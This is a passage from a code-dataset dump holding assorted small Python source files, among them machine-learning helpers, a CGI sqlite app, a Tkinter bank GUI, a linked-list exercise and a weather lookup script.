# print(mapping)\n\n result = model.predict(x_test)\n result = [mapping[i] for i in result]\n\n acc = metrics.accuracy_score(result, y_test)\n show = round(acc * 100)\n\n # # Printing results\n # print(f'\\nK Means - {name} =======================================================================')\n # print(f'The accuracy is {show} %')\n # print(f'{list(result)}')\n # print(f'{list(y_test)}')\n\n dic = {\n \"result\": result,\n \"acc\": acc,\n \"show\": show\n }\n\n return dic","sub_path":"Topicos/Projeto-final/Algoritmos/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"364213995","text":"from .Guests import *\r\nfrom .Registered import *\r\nfrom .filetpl import loadTpl\r\nimport pickle, cgi, cgitb, codecs, sys, os\r\ncgitb.enable()\r\nimport sqlite3\r\n\r\nclass Library:\r\n def __init__(self, q, selfurl, db):\r\n self.q = q\r\n self.selfurl = selfurl\r\n self.l = list()\r\n self.id_count = 0\r\n self.db = db\r\n self.libf()\r\n\r\n def libf(self):\r\n self.db.row_factory = sqlite3.Row\r\n self.dbc = self.db.cursor()\r\n self.dbc.execute('create table if not exists lib(id_count integer primary key autoincrement, number text, name text, surname text)')\r\n self.db.commit()\r\n\r\n def showForm(self):\r\n print (loadTpl('menu').format(self.selfurl, self.q.getvalue('student')))\r\n self.dbc.execute('select * from lib')\r\n# self.db.commit()\r\n for item in self.dbc.fetchall():\r\n if item['number'] is None:\r\n ob = Guest(self.q, self.selfurl)\r\n else:\r\n ob = Registered(self.q, self.selfurl)\r\n ob.readDb(item)\r\n ob.show()\r\n print ('')\r\n \r\n def addGuest(self):\r\n guest = Guest(self.q, self.selfurl)\r\n guest.add()\r\n \r\n def addReg(self):\r\n reg = Registered(self.q, self.selfurl)\r\n reg.add()\r\n \r\n def edit_student(self):\r\n iid = self.q.getvalue('id')\r\n self.dbc.execute('SELECT * FROM lib WHERE id_count=?', (iid,))\r\n# self.db.commit()\r\n data = self.dbc.fetchone()\r\n if data['number'] is None:\r\n obj = Guest(self.q, self.selfurl)\r\n else:\r\n obj = Registered(self.q, self.selfurl)\r\n obj.readDb(data)\r\n obj.edit() \r\n\r\n def save_student(self):\r\n if self.q.getvalue('obj') == '1':\r\n obj = Guest(self.q, self.selfurl)\r\n if self.q.getvalue('obj') == '2':\r\n obj = Registered(self.q, self.selfurl)\r\n obj.save()\r\n obj.saveDb(self.db)\r\n# self.db.commit()\r\n self.showForm()\r\n\r\n def delete(self):\r\n iid = self.q.getvalue('id')\r\n self.dbc.execute('delete from lib where id_count=?', (iid,))\r\n# self.db.commit()\r\n self.showForm()\r\n\r\n def clear(self):\r\n self.clearAll()\r\n self.showForm()\r\n\r\n def clearAll(self):\r\n self.db.executescript(\"\"\"\r\n delete from lib;\r\n delete from SQLITE_SEQUENCE where name='lib';\r\n \"\"\")\r\n self.db.commit()\r\n\r\n def import_file(self):\r\n if (os.path.exists('cgi-bin/st02/file.db')):\r\n self.clearAll()\r\n with open('cgi-bin/st02/file.db', 'rb') as f:\r\n self.l = pickle.load(f)\r\n for item in self.l:\r\n item.id = -1\r\n item.saveDb(self.db)\r\n self.db.commit()\r\n self.showForm()\r\n","sub_path":"cgi-bin/st02/Library.py","file_name":"Library.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"470021997","text":"\nimport os\nimport pandas\nimport numpy as np\nfrom pandas.core.series import Series\n\n\ndef parse_metadata(movie_id):\n fname = 'metadata/{}.txt'.format(movie_id)\n with open(fname, 'rb') as mfile:\n lines = mfile.readlines() \n if len(lines) < 2: return pandas.DataFrame()\n\n genres = lines[1].split('\\t')\n if len(genres) < 2: return pandas.DataFrame()\n\n genres = [s.strip() for s in genres][1:]\n data = pandas.DataFrame({'movie': np.repeat(movie_id, len(genres)), 'genre': genres})\n return data\n\n\ndef main():\n\n movies_df = pandas.DataFrame()\n metadata_dir = 'metadata/'\n for f in os.listdir(metadata_dir):\n if f.endswith(\".txt\"):\n movie_id, ext = tuple(f.split('.'))\n df = parse_metadata(movie_id)\n movies_df = movies_df.append(df)\n\n movies_df['count'] = 1\n movies_df = movies_df.pivot(index='movie', columns='genre', values='count').fillna('0')\n movies_df = movies_df.astype(int)\n movies_df.to_csv('output/movie_genres.csv')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"read_metadata.py","file_name":"read_metadata.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"18577539","text":"# Made by Ronald van Egdom.\r\n# For HKU Creative Programming with Python.\r\n# Lab 2.\r\n\r\n# Importing the GenericObject class.\r\nfrom GenericObject import GenericObject\r\nint_border = 0 # Minimum object distance from edge of the screen.\r\n\r\n# Object Creation.\r\n# Width, Height, X, Y, Border, Speed, Going Left, Going Right, Shape.\r\nobject_1 = GenericObject(50,50,int_border+250,int_border,int_border,5,False,False,\"rectangle\") # First Object\r\nobject_2 = GenericObject(100,100,int_border,int_border+250,int_border,10,False,False,\"ellipse\") # Second Object\r\n \r\ndef setup(): # Defining parameters that run once.\r\n size(1000,700) # Screen size.\r\n background(50) # A g background.\r\n noStroke()\r\n GenericObject.setupGenericObject()\r\n \r\ndef draw(): # Continually runs as long as the program runs.\r\n background(50) # Cleaning the screen from previous draws.\r\n GenericObject.update(object_1)\r\n GenericObject.update(object_2)","sub_path":"Lab 2/Moving_Objects_With_Array_and_Method/Moving_Objects_With_Method_and_Class/Moving_Objects_With_Method_and_Class.pyde","file_name":"Moving_Objects_With_Method_and_Class.pyde","file_ext":"pyde","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"276326391","text":"from argparse import ArgumentParser\n\n# python palindrome_check.py -text asddsa\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('-text', type=str, required=True, help='Text to check')\n args = parser.parse_args()\n\n print(args.text == args.text[::-1])\n","sub_path":"palindrome_check.py","file_name":"palindrome_check.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"594971540","text":"#!/usr/bin/python\n# -*- codding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import write_two_parameter\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/license-manager/create-grant-version.html\nif __name__ == '__main__':\n \"\"\"\n\n \"\"\"\n\n parameter_display_string = \"\"\"\n # client-token : Unique, case-sensitive identifier that you provide to ensure the idempotency of the request.\n # grant-arn : Amazon Resource Name (ARN) of the grant.\n \"\"\"\n add_option_dict = {}\n add_option_dict[\"parameter_display_string\"] = parameter_display_string\n # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n write_two_parameter(\"license-manager\", \"create-grant-version\", \"client-token\", \"grant-arn\", add_option_dict)\n","sub_path":"license-manager_write_2/grant-version_create.py","file_name":"grant-version_create.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"19949210","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Product',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('name', models.CharField(blank=True, null=True, max_length=255)),\n ('product_type', models.CharField(blank=True, null=True, max_length=30)),\n ('price', models.FloatField(blank=True, default=0.0, null=True)),\n ('landing_url', models.URLField(blank=True, null=True)),\n ('image', models.URLField(blank=True, null=True)),\n ('description', models.CharField(blank=True, null=True, max_length=255)),\n ('scraped_date', models.DateTimeField(auto_now=True)),\n ],\n ),\n ]\n","sub_path":"apps/home/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"30039951","text":"from tokenization.crf_tokenizer import CrfTokenizer\nfrom word_embedding.word2vec_gensim import Word2Vec\nfrom text_classification.short_text_classifiers import BiDirectionalLSTMClassifier, load_synonym_dict\n# Please give the correct paths\n# Load word2vec model from file. If you want to train your own model, please go to README or check word2vec_gensim.py\nword2vec_model = Word2Vec.load('models/pretrained_word2vec.bin')\n\ntokenizer = CrfTokenizer(config_root_path='tokenization/',\n model_path='models/pretrained_tokenizer.crfsuite')\nsym_dict = load_synonym_dict('data/sentiment/synonym.txt')\nkeras_text_classifier = BiDirectionalLSTMClassifier(tokenizer=tokenizer, word2vec=word2vec_model.wv,\n model_path='models/app.h5',\n max_length=10, n_epochs=10,\n sym_dict=sym_dict, n_class=3)\n# Load and prepare data\nX, y = keras_text_classifier.load_data()\n\n# Train your classifier and test the model\nkeras_text_classifier.train(X, y)\nlabel_dict = {0: 'mo_vnexpress', 1: 'mo_dantri', 2: 'mo_truyenfull'}\ntest_sentences = ['vnexpress come', 'dân trí lên', 'truyện đê', 'vnexpress chế']\nlabels = keras_text_classifier.classify(test_sentences, label_dict=label_dict)\nprint(labels)\n\n\n\n","sub_path":"TroLyAo.py","file_name":"TroLyAo.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"586856331","text":"import datetime\r\nimport sys\r\nimport csv\r\nimport time\r\nfrom Time_Series_Models.prophet_model import prophet_prediction\r\nfrom Time_Series_Models.ARIMA_model import arima_prediction\r\n\"\"\"\r\n.. module:: AIRPrediction\r\n :synopsis: The driver file that is to be imported to utilize the AIRPrediction Framework.\r\n Includes a function for input validation, prophet predictions, ARIMA predictions, and comparison of the two models.\r\n.. moduleauthors:: Derek Pena , Colin Naehr , Daniel Casto , \r\n Haotian Wang \r\n\"\"\"\r\n\r\n\r\ndef validate_input(pollutant, state, county, city, date):\r\n \"\"\" Validates the input provided by a user. To be used before any predictions are made.\r\n :param pollutant: The specified pollutant to predict (NO2, O3, SO2, CO).\r\n :param state: The location parameter indicating the state in the United States of America to predict for.\r\n :param county: The location parameter indicating the county in the state to predict for.\r\n :param city: The location parameter indicating the city in the county to predict for.\r\n :param date: The calendar date to prediction for.\r\n :return: A boolean that determines where validation was successful, a string that contains any error messages\r\n and a string that rewrites the data parameter in YYYY/MM/DD format.\r\n \"\"\"\r\n validate = True\r\n return_message = \"\"\r\n valid_pollutants = ['NO2', 'O3', 'SO2', 'CO']\r\n entered_datetime = \"\"\r\n if pollutant == \"\" or state == \"\" or county == \"\" or city == \"\" or date == \"\":\r\n return False, \"Error: One or more fields left blank. Please fill out all fields.\", entered_datetime\r\n\r\n if pollutant not in valid_pollutants:\r\n validate = False\r\n return_message = \"Error: Invalid Pollutant.\"\r\n else:\r\n if len(date) == 10:\r\n if date[2] != '/' or date[5] != '/':\r\n validate = False\r\n return_message = \"Error: Invalid Date Format.\"\r\n\r\n month = date[:2]\r\n day = date[3:5]\r\n year = date[6:]\r\n\r\n entered_datetime = datetime.datetime(int(year), int(month), int(day))\r\n\r\n current_date = datetime.date.today().strftime('%m/%d/%Y')\r\n current_month = current_date[:2]\r\n current_day = current_date[3:5]\r\n current_year = current_date[6:]\r\n current_datetime = datetime.datetime(int(current_year), int(current_month), int(current_day))\r\n\r\n if entered_datetime > current_datetime:\r\n validate = True\r\n month_string = str(entered_datetime.month)\r\n day_string = str(entered_datetime.day)\r\n if len(month_string) == 1:\r\n month_string = '0' + month_string\r\n if len(day_string) == 1:\r\n day_string = '0' + day_string\r\n entered_datetime = str(entered_datetime.year) + '-' + month_string + '-' + day_string\r\n\r\n with open(\"data/predictable_areas.csv\") as file:\r\n location_validator = csv.reader(file)\r\n location_validation = False\r\n state_validation = False\r\n county_validation = False\r\n city_validation = False\r\n for row in location_validator:\r\n if row[0] == state:\r\n state_validation = True\r\n if row[1] == county and row[2] == city:\r\n location_validation = True\r\n if row[1] == county:\r\n county_validation = True\r\n if row[2] == city:\r\n city_validation = True\r\n if not location_validation:\r\n validate = False\r\n if state_validation and county_validation and city_validation:\r\n return_message = \"Error: State, county, and city found. However, the combination of those parameters was not found in the dataset.\"\r\n else:\r\n return_message = \"Error: Following location parameters not found in the dataset:\"\r\n if not state_validation:\r\n return_message += \" State,\"\r\n if not county_validation:\r\n return_message += \" County,\"\r\n if not city_validation:\r\n return_message += \" City.\"\r\n if return_message[len(return_message) - 1] == \",\":\r\n return_message = return_message[0:(len(return_message) - 1)]\r\n return_message += \".\"\r\n else:\r\n validate = False\r\n return_message = \"Error: Invalid Date. Entered date must occur after current date.\"\r\n else:\r\n validate = False\r\n return_message = \"Error: Invalid Date Format.\"\r\n return validate, return_message, entered_datetime\r\n\r\n\r\ndef prophet(pollutant, state, county, city, date):\r\n \"\"\" A function that uses the prophet_prediction from prophet_model.py to avoid using multiple import statements.\r\n :param pollutant: The specified pollutant to predict (NO2, O3, SO2, CO).\r\n :param state: The location parameter indicating the state in the United States of America to predict for.\r\n :param county: The location parameter indicating the county in the state to predict for.\r\n :param city: The location parameter indicating the city in the county to predict for.\r\n :param date: The calendar date to prediction for.\r\n :return: The prediction made by the prophet model given the above parameters and the units that prediction is in.\r\n \"\"\"\r\n return prophet_prediction(pollutant, state, county, city, date)\r\n\r\n\r\ndef arima(pollutant, state, county, city, date):\r\n \"\"\" A function that uses the arima_prediction from ARIMA_model.py to avoid using multiple import statements.\r\n :param pollutant: The specified pollutant to predict (NO2, O3, SO2, CO).\r\n :param state: The location parameter indicating the state in the United States of America to predict for.\r\n :param county: The location parameter indicating the county in the state to predict for.\r\n :param city: The location parameter indicating the city in the county to predict for.\r\n :param date: The calendar date to prediction for.\r\n :return: The prediction made by the ARIMA model given the above parameters and the units that prediction is in.\r\n \"\"\"\r\n return arima_prediction(pollutant, state, county, city, date)\r\n\r\n\r\ndef compare_models(pollutant, state, county, city, date):\r\n \"\"\"The driver file that is to be imported to utilize the AIRPrediction Framework.\r\n Includes a function for input validation, prophet predictions, ARIMA predictions, and comparison of the two models.\r\n Module Authors: Derek Pena , Colin Naehr , Daniel Casto ,\r\n Haotian Wang \r\n\r\n compare_models is a function that times both prediction models in order to compare their speed and their output.\r\n\r\n :param pollutant: The specified pollutant to predict (NO2, O3, SO2, CO).\r\n :param state: The location parameter indicating the state in the United States of America to predict for.\r\n :param county: The location parameter indicating the county in the state to predict for.\r\n :param city: The location parameter indicating the city in the county to predict for.\r\n :param date: The calendar date to prediction for.\r\n :return: A list that contains the outputs for each prediction model as well as the time taken to run them.\r\n \"\"\"\r\n output_list = []\r\n start_one = time.time()\r\n prediction, units = prophet_prediction(pollutant, state, county, city, date)\r\n end_one = time.time()\r\n output_list.append(prediction)\r\n output_list.append(units)\r\n output_list.append(end_one - start_one)\r\n start_two = time.time()\r\n prediction, units = arima_prediction(pollutant, state, county, city, date)\r\n end_two = time.time()\r\n output_list.append(prediction)\r\n output_list.append(units)\r\n output_list.append(end_two - start_two)\r\n return output_list\r\n","sub_path":"AIRPrediction.py","file_name":"AIRPrediction.py","file_ext":"py","file_size_in_byte":8469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"646254470","text":"class Node:\n\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\n\nclass LinkedList:\n \n def __init__(self):\n self.root = None\n \n def add(self, data):\n new_node = Node(data,self.root)\n self.root = new_node\n \n def __str__(self):\n if not self.root:\n return 'LinkedList ([])'\n else:\n curr = self.root\n out = 'LinkedList ([{}, '.format(str(curr.data))\n while curr.next:\n curr = curr.next\n out += '{}, '.format(str(curr.data))\n return out[:-2] + '])'\n\n\n @staticmethod\n def from_list(l): \n ll = LinkedList()\n for i in l[::-1]:\n ll.add(i)\n return ll\n\n\ndef rearrange(llist):\n '''\n >>> for i in range(6):\n ... ll = LinkedList.from_list(range(i))\n ... print ll, '->',\n ... print rearrange(ll)\n LinkedList ([]) -> LinkedList ([])\n LinkedList ([0]) -> LinkedList ([0])\n LinkedList ([0, 1]) -> LinkedList ([0, 1])\n LinkedList ([0, 1, 2]) -> LinkedList ([0, 2, 1])\n LinkedList ([0, 1, 2, 3]) -> LinkedList ([0, 3, 1, 2])\n LinkedList ([0, 1, 2, 3, 4]) -> LinkedList ([0, 4, 1, 3, 2])\n '''\n if llist.root is None:\n return llist\n first = llist.root\n while True:\n second = first.next\n curr = first\n if not second or not second.next:\n break\n while curr.next:\n prev,curr = curr,curr.next\n prev.next = None\n first.next = curr\n first = curr.next = second \n return llist\n \nif __name__ == \"__main__\":\n import doctest\n doctest.testmod(verbose=True)\n\n\n","sub_path":"test_4.py","file_name":"test_4.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"70078478","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom __future__ import absolute_import\n\nimport oneflow as flow\n\n\ndef conv2d_layer(\n name,\n input,\n filters,\n kernel_size=3,\n strides=1,\n padding=\"SAME\",\n data_format=\"NCHW\",\n dilation_rate=1,\n activation=\"Relu\",\n use_bias=True,\n weight_initializer=flow.random_uniform_initializer(),\n bias_initializer=flow.constant_initializer(),\n):\n weight_shape = (filters, input.shape[1], kernel_size, kernel_size)\n weight = flow.get_variable(\n name + \"-weight\",\n shape=weight_shape,\n dtype=input.dtype,\n initializer=weight_initializer,\n )\n output = flow.nn.conv2d(\n input, weight, strides, padding, data_format, dilation_rate, name=name\n )\n if use_bias:\n bias = flow.get_variable(\n name + \"-bias\",\n shape=(filters,),\n dtype=input.dtype,\n initializer=bias_initializer,\n )\n output = flow.nn.bias_add(output, bias, data_format)\n\n if activation is not None:\n if activation == \"Relu\":\n output = flow.math.relu(output)\n else:\n raise NotImplementedError\n\n return output\n","sub_path":"oneflow/python/benchmarks/cnn_benchmark/model_util.py","file_name":"model_util.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"453539488","text":"\n#\nfrom .... import global_var\n\n\ndef power(ax,\n df,\n map_code = None,\n load_nature = None,\n load_unit = None,\n **kwargs,\n ):\n \"\"\"\n Draws in a subplot the load data.\n \n :param ax: The ax to fill\n :param df: The load data\n :param map_code: The delivery zone\n :param load_nature: The nature of the data to plot\n :param kwargs: additional parameter for the plt.plot function\n :type ax: matplotlib.axes._subplots.AxesSubplot\n :type df: pd.DataFrame\n :type map_code: string\n :type load_nature: string\n :type kwargs: dict\n :return: None\n :rtype: None\n \"\"\" \n \n # dg = df.xs((map_code,\n # load_nature,\n # ),\n # level = (global_var.geography_map_code,\n # global_var.load_nature,\n # ),\n # axis = 1,\n # )\n dg = df.loc[ (df[global_var.geography_map_code] == map_code)\n & (df[global_var.load_nature] == load_nature)\n ]\n \n dg = dg.dropna()\n ax.plot(dg.index,\n dg[load_unit],\n **kwargs,\n )\n","sub_path":"pub_data_visualization/load/plot/subplot/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"21533262","text":"\n\nimport lab4\nfrom tkinter import *\n\nclass Application(Frame):\n def __init__(self, master):\n Frame.__init__(self, master)\n self.grid()\n self.create_widgets()\n\n # ---------- THIS IS WHERE ALL THE GUI ITEMS ARE CREATED ---------\n def create_widgets(self):\n # create a label and entry for name\n Label(self,\n text=\"Name:\"\n ).grid(row=0, column=0, sticky=W)\n self.name_ent = Entry(self)\n self.name_ent.grid(row=0, column=1, sticky=W)\n\n # create a label and entry for name\n Label(self,\n text=\"PIN code:\"\n ).grid(row=2, column=0, sticky=W)\n self.pin_ent = Entry(self)\n self.pin_ent.grid(row=2, column=1, sticky=W)\n\n Label(self,\n text=\"Amount:\"\n ).grid(row=3, column=0, sticky=W)\n self.amount_ent = Entry(self)\n self.amount_ent.grid(row=3, column=1, sticky=W)\n\n # create VIP check button\n self.is_vip = BooleanVar()\n Checkbutton(self,\n text=\"Person is a VIP\",\n variable=self.is_vip\n ).grid(row=1, column=1, sticky=W)\n\n # create buttons for for adding persons and running simulator\n self.bttn_add = Button(self,\n text=\"Create Account\",\n command=self.bttn_create_account)\n self.bttn_add.grid(row=0, column=2, sticky=W)\n\n self.bttn_sim = Button(self,\n text=\"Withdrawal\",\n command=self.bttn_withdrawal)\n self.bttn_sim.grid(row=1, column=2, sticky=W)\n\n self.bttn_dep = Button(self,\n text=\"Deposit\",\n command=self.bttn_deposit)\n self.bttn_dep.grid(row=2, column=2, sticky=W)\n\n self.bttn_chPIN = Button(self,\n text=\"Change PIN\",\n command=self.bttn_change_PIN)\n self.bttn_chPIN.grid(row=3, column=2, sticky=W)\n\n self.bttn_view_t = Button(self,\n text=\"View Transactions\",\n command=self.bttn_view_transactions)\n self.bttn_view_t.grid(row=4, column=2, sticky=W)\n\n # create text field\n self.output_txt = Text(self, width=55, height=10, wrap=WORD)\n self.output_txt.grid(row=6, column=0, columnspan=2)\n\n # ---------- SOME HELPING FUNCTIONS ---------\n\n def get_name_pin(self):\n try:\n self.name = self.name_ent.get()\n if len(self.name) == 0:\n raise ValueError(\"empty name\")\n self.pin = int(self.pin_ent.get())\n except ValueError as error:\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, \"PIN needs to be an integer and name cannot be empty!\")\n return False\n else:\n return True\n\n def get_name_pin_amount(self):\n if self.get_name_pin() == False:\n return False\n else:\n try:\n self.amount = int(self.amount_ent.get())\n except ValueError as error:\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, \"Amount needs to be an integer!\")\n return False\n else:\n return True\n\n # ---------- THIS IS THE FUNCTIONS EXECUTED BY THE GUI ITEMS ---------\n\n def bttn_create_account(self):\n if self.get_name_pin_amount() == True:\n if self.is_vip.get():\n lab4.account_dict[self.name] = lab4.PremiumAccount(self.name, self.amount, self.pin)\n else:\n lab4.account_dict[self.name] = lab4.Account(self.name, self.amount, self.pin)\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, self.name + \" has a new account...\")\n\n def bttn_withdrawal(self):\n if self.get_name_pin_amount() == True:\n if self.name in lab4.account_dict:\n result = lab4.account_dict[self.name].withdrawal(self.amount, self.pin)\n else:\n result = self.name + \" does not have an account with us, would you like to create one?\"\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, result)\n\n def bttn_deposit(self):\n if self.get_name_pin_amount() == True:\n if self.name in lab4.account_dict:\n result = lab4.account_dict[self.name].deposit(self.amount)\n else:\n result = self.name + \" does not have an account with us, would you like to create one?\"\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, result)\n\n\n def bttn_change_PIN(self):\n old_pin = self.pin\n if self.get_name_pin() == True:\n if self.name in lab4.account_dict:\n result = lab4.account_dict[self.name].change_PIN(old_pin, self.pin)\n else:\n result = self.name + \" does not have an account with us, would you like to create one?\"\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, result)\n\n\n def bttn_view_transactions(self):\n if self.get_name_pin() == True:\n if self.name in lab4.account_dict:\n if lab4.account_dict[self.name].ok_PIN(self.pin):\n result = lab4.account_dict[self.name]\n else:\n result = \"Wrong PIN\"\n else:\n result = self.name + \" does not have an account with us, would you like to create one?\"\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, result)\n\n\n # ---------- SETTING UP THE MAIN WINDOW ---------\n\n\nroot = Tk()\nroot.title(\"The Mega-Bank\")\nroot.geometry(\"700x300\")\nmy_app = Application(root)\nroot.mainloop()\n\n\n\n\n\n","sub_path":"Lab4/lab4_gui.py","file_name":"lab4_gui.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"319435857","text":"# Neeraja Ramanan - 06/25/2014\n# This program renders a parabolaidic curve using straight lines\nimport turtle\n\ndef drawLine(y,x, granularity, myTurtle):\n myTurtle.up()\n if y>base_y:\n myTurtle.goto(base_x,y)\n myTurtle.down()\n myTurtle.goto(x,base_y)\n drawLine(y-granularity,x+granularity,granularity,myTurtle)\n else:\n myTurtle.ht()\n\nif __name__==\"__main__\":\n myWin = turtle.Screen()\n myTurtle = turtle.Turtle()\n ypos = (myWin.window_height()/2)\n xpos = -1*((myWin.window_width()/2))\n global base_x\n base_x = xpos\n global base_y\n base_y = -1*ypos\n drawLine(ypos,xpos,30,myTurtle)\n myWin.exitonclick()\n","sub_path":"practice/curve.py","file_name":"curve.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"509647703","text":"words = input().split(' ')\nneeded_word = input()\nall_pal = []\nsearched_pal = 0\nfor i in words:\n if i[::-1] == needed_word:\n searched_pal += 1\n if i[::-1] == i:\n all_pal.append(i)\nprint(all_pal)\nprint(f\"Found palindrome {searched_pal} times\")","sub_path":"Lists Advanced/3_Palindrome_Strings.py","file_name":"3_Palindrome_Strings.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"208185703","text":"from dwca_utils import response\nfrom dwca_utils import setup_actor_logging\nimport os\nimport logging\nimport uuid\nimport inspect\n\ndef python_actor(do_stuff):\n def do_stuffer(options):\n print (\"path\" + os.getcwd())\n setup_actor_logging(options)\n\n #logging.debug('Started %s' % __version__)\n logging.debug('options: %s' % options)\n\n # Make a list of keys in the response dictionary\n returnvars = ['workspace', 'outputfile', 'success', 'message', 'artifacts']\n\n ### Standard outputs ###\n success = False\n message = None\n\n ### Custom outputs ###\n\n # Make a dictionary for artifacts left behind\n artifacts = {}\n\n ### Establish variables ###\n inputfile = None\n outputfile = None\n\n ### Required inputs ###\n try:\n workspace = options['workspace']\n except:\n workspace = './'\n\n try:\n inputfile = options['inputfile']\n except:\n pass\n\n if inputfile is None or len(inputfile) == 0:\n #message = 'No input file given. %s' % __version__\n message = 'No input file given.'\n returnvals = [workspace, outputfile, success, message, artifacts]\n logging.debug('message:\\n%s' % message)\n return response(returnvars, returnvals)\n\n if os.path.isfile(inputfile) == False:\n #message = 'Input file %s not found. %s' % (inputfile, __version__)\n message = 'Input file %s not found.' % inputfile\n returnvals = [workspace, outputfile, success, message, artifacts]\n logging.debug('message:\\n%s' % message)\n return response(returnvars, returnvals)\n\n try:\n outputfile = options['outputfile']\n except:\n pass\n\n if outputfile is None or len(outputfile) == 0:\n outputfile = 'dwca_' + str(uuid.uuid1()) + '.zip'\n\n # Construct the output file path in the workspace\n outputfile = '%s/%s' % (workspace.rstrip('/'), outputfile)\n\n ### Optional inputs ###\n params = []\n argspec = inspect.getargspec(do_stuff)\n\n for arg in argspec.args:\n if arg == 'inputfile':\n params.append(inputfile)\n elif arg == 'outputfile':\n params.append(outputfile)\n elif arg == 'workspace':\n params.append(workspace)\n\n else:\n if (arg in options):\n params.append(options[arg])\n else:\n raise KeyError('%s not supplied as a parameter of %s in yaml config' % (arg, do_stuff.func_name))\n\n # Do the actual work now that the preparation is complete\n success = do_stuff(*params)\n\n # Add artifacts to the output dictionary if all went well\n if success == True:\n artifacts['template_output_file'] = outputfile\n\n # Prepare the response dictionary\n returnvals = [workspace, outputfile, success, message, artifacts]\n #logging.debug('Finishing %s' % __version__)\n logging.debug('Finishing')\n return response(returnvars, returnvals)\n return do_stuffer\n","sub_path":"packages/kurator_fp/actor_decorator.py","file_name":"actor_decorator.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"44697990","text":"import pyowm\r\nprint(\"To exit, enter, y/n\")\r\nwhile True:\r\n\ttry:\r\n\t\tcity = input(\"Which city are you interested in?: \")\r\n\t\tif city == 'y' or city == 'exit' or city == 'quit':\r\n\t\t\tbreak\r\n\t\tif city == 'n':\r\n\t\t\tpass\r\n\t\towm = pyowm.OWM('91c713db144e1ce5a94dffd4229169ed')\r\n\t\tobservation = owm.weather_at_place(city)\r\n\t\tw = observation.get_weather()\r\n\t\tt_temperature = w.get_temperature('celsius') ['temp']\r\n\t\tw_wind = w.get_wind()\r\n\t\th_humidity = w.get_humidity()\r\n\t\tdetailstat = w.get_detailed_status()\r\n\t\ttemp = 'In the city \"{0}\", Now the temperature: \"{1}°\", Celsius.'.format(city, str(t_temperature))\r\n\t\twindd = 'Angle and wind speed: \"{0}°\" Degrees!'.format(str(w_wind))\r\n\t\thum = 'Humidity in \t: \"{0}\": {1} %'.format(city, str(h_humidity))\r\n\t\tdet_list = 'Cloudiness:\"{0}\", \\n For today, thank you for using the program! \\n'.format(detailstat)\r\n\t\tprint(temp)\r\n\t\tprint(windd)\r\n\t\tprint(hum)\r\n\t\tprint(det_list)\r\n\texcept KeyboardInterrupt:\r\n\t\tprint(\"Invalid location 